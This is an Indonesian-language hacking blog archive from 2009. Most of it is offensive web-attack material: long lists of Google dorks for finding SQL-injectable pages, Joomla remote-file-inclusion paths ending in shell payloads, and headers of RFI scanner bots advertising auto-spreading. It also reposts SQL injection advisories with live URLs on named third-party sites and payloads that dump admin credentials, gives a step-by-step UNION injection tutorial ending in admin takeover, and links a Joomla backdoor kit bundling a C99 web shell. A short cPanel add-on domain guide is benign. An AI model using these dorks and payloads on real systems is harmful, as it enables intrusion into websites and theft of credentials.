Get The Code And Feel The Soul: 2009

Bug Dork SQL

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"

FeeLCoMz RFI Scanner Bot v5.4

#!/usr/bin/perl
print('
##################################################
## FeeLCoMz RFI Scanner Bot v5.4 (FeeLScaNz.pl) ##
## By FaTaLisTiCz_Fx ##
## © Agu 2008 - Okt 2009, FeeLCoMz Community ##
##################################################
');
######################################################
## Usage: ##
## perl feelscanz.pl ##
## ##
## Notes: ##
## + All Parameters are optional ##
## ##
## Features: ##
## + RFI Scanner ##
## + RFI Scan & Exploit (Exploit per engine) ##
## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
## + Auto Spreading ##
## + MD5 Crack Search ##
######################################################

Download Full Id here

VopCrew Multi Scanner 5.1 Release

############################################
# VopCrew Multi Scanner v5.1 #
# Coded by Vrs-hCk #
# d00r[at]telkom[dot]net #
# Copyleft © 2009 VopCrew UnderGrounD #
############################################
# perl vopcrew.txt help me !!! #
############################################

Download here

CMS WEBjump! SQL Injection

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

–== Dork ==–
Powered by Content Management System WEBjump! “portfolio_genre.php?id=”

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version–

–== Dork ==–
Powered by Content Management System WEBjump! “news_id.php?lang=”

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5–

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]

Source

Giga Nepal SQL Injection Vulnerability

======================================
Author : Gonzhack

Contact : gonzhack@gmail.com

Home : Http://www.indonesiancoder.com

======================================
D0rk : Powered By Giga Nepal
======================================
Bug :

/newsdetail.php?id=[sql]

POC :

-2+union+select+1,concat(username,0x3a,password),3,4,5,6+from+mytbladminlogin–

======================================

Source

Powered by eNdonesia 8.3

____________________________________________________
————————-IndonesiaCoder Team—————————
____________________________________________________

Author : CYB3R_TR0N
Contact : ds1.webdeessaint@yahoo.com
website : www.indonesiancoder.com , www.webdeessaint.com
____________________________________________________

#
Dork :
Powered by eNdonesia 8.3 mod.php?id=

#
Example:

http://www.site.com/mod.php?mod=publisher&op=viewarticle&artid={SQL}

#
Exploit :
-9999+union+select+1,2,3,concat_ws(0×3a,aid,email,pwd),5,6,7,8,9,10,11+from+authors–

____________________________________________________

————————————————————————-
cyb3rtr0n
Indonesian Coder Team
www.webdeessaint.com

————————————————————————-

GreetZ :
—> All IndonesiaCoder Team
—> Agiinda Wardani

————————[ Fifala Indonesian Coder Team ]————————

Source

Add-On Domain di cpanel

Model Marketing mutakhir dan paling umum beberapa situs hosting adalah dengan menawarkan pilihan “Add-On Dmmain”. Istilah ini merujuk pada domain tambahan yang dikelola di bawah akun hosting utama. Biasanya, domain-domain tambahan ini secara fisik akan ditempatkan di dalam sub-direktori root dokumen hosting. Selanjutnya Add-On Domain akan berbagi resource dengan pembatasan yang sama dengan akun hosting utama termasuk bandwith, space harddisk, akun email, database dan fasilitas lainnya. Uniknya Add-on domain dapat diakses langsung dari nama domain dedicated-nya sendiridan mempunyai akun FTP serta statistik situs sendiri. Misalnya: indonesiancoder.com, saya tambahkan Addon Domain indonesiancoder.co.cc, saya bisa langsung akses addon domain dengan mengetikkan indonesiancoder.co.cc di browser yang saya pakai.

Anda dapat membuat Add-on domain ini melalui Cpanel dengan cara:

1. Temukan grup “Addon Domains” pada menu utama.
2. Masukkan nama domain, nama direktori tempat penyimpanan data add-on domain berikut passwordnya.
3. Ingat, jangan buat direktori dulu, CPanel otomatis akan membuatkan direktori saat proses pembuatan Addon Domain buat Anda sekaligus menambahkannya ke dalam entri data konfigurasi server hosting, mengarahkan domain ke direktori tersebut serta membuatkan akun ftp untuk domain tersebut.

Login FTP yang dipakai menggunakan format “namadirektori@namawebsiteutama.com”. Jika Anda memiliki hosting di namawebsiteutama.com dan Anda membuat addon domain bernama namadomainaddonnya.com, dengan nama direktori namadomainaddonnya dan password ‘terserahanda’ maka Anda akan login ke ftp.contoh.com dengan username namadomainaddonnya@namawebsiteutama.com dan password ‘terserahanda’.

Tapi ingat, Anda tetap harus mendaftarkan nama add-on domain yang Anda pilih persis seperti Anda mendaftarkan nama domain pada umumnya. Anda juga harus mengarahkan Nameserver Domain ke Nameserver domain utama Anda.

Beberapa hal yang perlu diperhatikan tentang Search Engine dan Add-On Domain

Website biasanya akan lebih mudah dikenali Google dan mesin pencari lain jika menggunakan satu URL statis saja. Ketika Anda membuat Add-on Domain lewat CPanel dengan cara di atas, Add-on domain Anda dapat diakses melakui tiga alamat sebagai berikut:

http://www.contoh2.com
http://contoh2.contoh.com (sebagai subdomain akun hosting utama)
http://www.contoh.com/contoh2/ (sebagai subdirektori akun hosting utama)

Hal di atas bisa mengakibatkan kacaunya pencatatan statistik website oleh search engine. Oleh karena itu pastikan Anda menggunakan fitur Redirects dalam CPanel untuk mengarahkan permintaan contoh.com/contoh ke addon domain yang tepat yakni contoh2.com. Anda juga harus menambahkan entri dalam file .htacces domain And auntuk me-redirect contoh2.contoh.com ke contoh2.com.
File .htaccess Anda seharusnya kurang lebih akan berisi kode seperti di bawah ini:

Options +FollowSymLinks
RewriteEngine on
#
# Redirect if “contoh” subdomain requested
RewriteCond %{HTTP_HOST} ^contoh2\.contoh.com
RewriteRule ^(.*)$ http://www.contoh2.com/$1 [R=301,L]

sekian dan terimakasih

wassalam

Source

Backdooring With Joomla Explorer Pada Web Joomla

Include :

* Video ( Demo )
* com_joomlaxplorer_1.6.3 ( Joomla Component )
* C99 ( PHP File )
* Read Me ( txt )

DOWNLOAD

Note :
Khusus web Joomla

Jika Sukses Menginstall maka akan keluar informasi seperti berikut ini.

Information :

Successfully installed joomlaXplorer
joomlaXplorer is a powerful File- and FTP Manager script.
It allows

* Browsing Directories & Files,
* Editing, Copying, Moving and Deleting files,
* Searching, Uploading and Downloading files,
* Creating new Files and Directories,
* Creating and Extracting Archives with Files and Directories,
* Changing file permissions (chmod)

and much more.

Source

My SQL Injection Step By Step

Pengertian sql injection :

SQL Injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal: [site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

www.ascii-convert.co.cc

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login

selanjutnya terserah anda karena kekuasaan web ada di tangan anda…

Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection

DOWNLOAD

anda langsung jalankan file ” SQL Injection.html ”

(Nb. mohon maaf apabila ada salah kata atau kekurangan dalam tutorial + video ini)

Salam

Gonzhack

Source

Bug Dork RFI Joomla

1---------------------------------------------------------------------------------
Google Dork:
inurl:"com_admin"

/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
2---------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_simpleboard

/components/com_simpleboard/file_upload.php?sbp=shell
3---------------------------------------------------------------------------------
Google Dork:
inurl:"com_hashcash"

/components/com_hashcash/server.php?mosConfig_absolute_path=shell
4---------------------------------------------------------------------------------
Google Dork:
inurl:"com_htmlarea3_xtd-c"

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
5---------------------------------------------------------------------------------
Google Dork:
inurl:"com_sitemap"

/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
6---------------------------------------------------------------------------------
Google Dork:
inurl:"com_performs"

/components/com_performs/performs.php?mosConfig_absolute_path=shell
7---------------------------------------------------------------------------------
Google Dork:
inurl:"com_forum"

/components/com_forum/download.php?phpbb_root_path=
8---------------------------------------------------------------------------------
Google Dork:
inurl:"com_pccookbook"

/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
9---------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_extcalendar

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
10--------------------------------------------------------------------------------
Google Dork:
inurl:"minibb"

/components/minibb/index.php?absolute_path=shell
11--------------------------------------------------------------------------------
Google Dork:
inurl:"com_smf"

/components/com_smf/smf.php?mosConfig_absolute_path=
P0C2 By Mr.aFiR:
/modules/mod_calendar.php?absolute_path=shell
12--------------------------------------------------------------------------------
Google Dork:
inurl:"com_pollxt"

/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
13--------------------------------------------------------------------------------
Google Dork:
inurl:"com_loudmounth"

/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
14--------------------------------------------------------------------------------
Google Dork:
inurl:"com_videodb"

/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
15--------------------------------------------------------------------------------
Google Dork:
inurl:index.php?option=com_pcchess

/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
16--------------------------------------------------------------------------------
Google Dork:
inurl:"com_multibanners"

/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
17--------------------------------------------------------------------------------
Google Dork:
inurl:"com_a6mambohelpdesk"

/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l
18--------------------------------------------------------------------------------
Google Dork:
inurl:"com_colophon"

/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
19--------------------------------------------------------------------------------
Google Dork:
inurl:"com_mgm"

/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
20--------------------------------------------------------------------------------
Google Dork:
inurl:"com_mambatstaff"

/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
21--------------------------------------------------------------------------------
Google Dork:
inurl:"com_securityimages"

/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

/components/com_securityimages/lang.php?mosConfig_absolute_path=shell
22--------------------------------------------------------------------------------
Google Dork:
inurl:"com_artlinks"

/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
23--------------------------------------------------------------------------------
Google Dork:
inurl:"com_galleria"

/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
24--------------------------------------------------------------------------------
Google Dork:
inurl:"com_akocomment"

/akocomments.php?mosConfig_absolute_path=shell
25--------------------------------------------------------------------------------
Google Dork:
inurl:"com_cropimage"

/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
26--------------------------------------------------------------------------------
Google Dork:
inurl:"com_kochsuite"

/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
27--------------------------------------------------------------------------------
Google Dork:
inurl:"com_comprofiler"

/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
28--------------------------------------------------------------------------------
Google Dork:
inurl:"com_zoom"

/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell

/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
29--------------------------------------------------------------------------------
Google Dork:
inurl:"com_serverstat"

/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
30--------------------------------------------------------------------------------
Google Dork:
inurl:"com_fm"

/components/com_fm/fm.install.php?lm_absolute_path=shell
31--------------------------------------------------------------------------------
Google Dork:
inurl:com_mambelfish

/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
32--------------------------------------------------------------------------------
Google Dork:
inurl:com_lmo

/components/com_lmo/lmo.php?mosConfig_absolute_path=shell
33--------------------------------------------------------------------------------
Google Dork:
inurl:com_linkdirectory

/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
34--------------------------------------------------------------------------------
Google Dork:
inurl:com_mtree

/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
35--------------------------------------------------------------------------------
Google Dork:
inurl:com_jim

/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
36--------------------------------------------------------------------------------
Google Dork:
inurl:com_webring

/administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
37--------------------------------------------------------------------------------
Google Dork:
inurl:com_remository

/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
38--------------------------------------------------------------------------------
Google Dork:
inurl:com_babackup

/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
39--------------------------------------------------------------------------------
Google Dork:
inurl:com_lurm_constructor

/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
40--------------------------------------------------------------------------------
Google Dork:
inurl:com_mambowiki

/components/com_mambowiki/ MamboLogin.php?IP=shell
41--------------------------------------------------------------------------------
Google Dork:
inurl:com_a6mambocredits

/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
42--------------------------------------------------------------------------------
Google Dork:
inurl:com_phpshop

/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
43--------------------------------------------------------------------------------
Google Dork:
inurl:com_cpg

/components/com_cpg/cpg.php?mosConfig_absolute_path=shell
44--------------------------------------------------------------------------------
Google Dork:
inurl:com_moodle

/components/com_moodle/moodle.php?mosConfig_absolute_path=shell
45--------------------------------------------------------------------------------
Google Dork:
inurl:com_extended_registration

/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
46--------------------------------------------------------------------------------
Google Dork:
inurl:com_mospray

/components/com_mospray/scripts/admin.php?basedir=shell
47--------------------------------------------------------------------------------
Google Dork:
inurl:com_bayesiannaivefilter

/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
48--------------------------------------------------------------------------------
Google Dork:
inurl:com_uhp

/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
49--------------------------------------------------------------------------------
Google Dork:
inurl:com_peoplebook

/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
50--------------------------------------------------------------------------------
Google Dork:
inurl:com_mmp

/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
51--------------------------------------------------------------------------------
Google Dork:
inurl:com_reporter

/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
52--------------------------------------------------------------------------------
Google Dork:
inurl:com_madeira

/components/com_madeira/img.php?url=shell
53--------------------------------------------------------------------------------
Google Dork:
inurl:com_jd-wiki

/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
54--------------------------------------------------------------------------------
Google Dork:
inurl:com_bsq_sitestats

/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell

/com_bsq_sitestats/external/rssfeed.php?baseDir=shell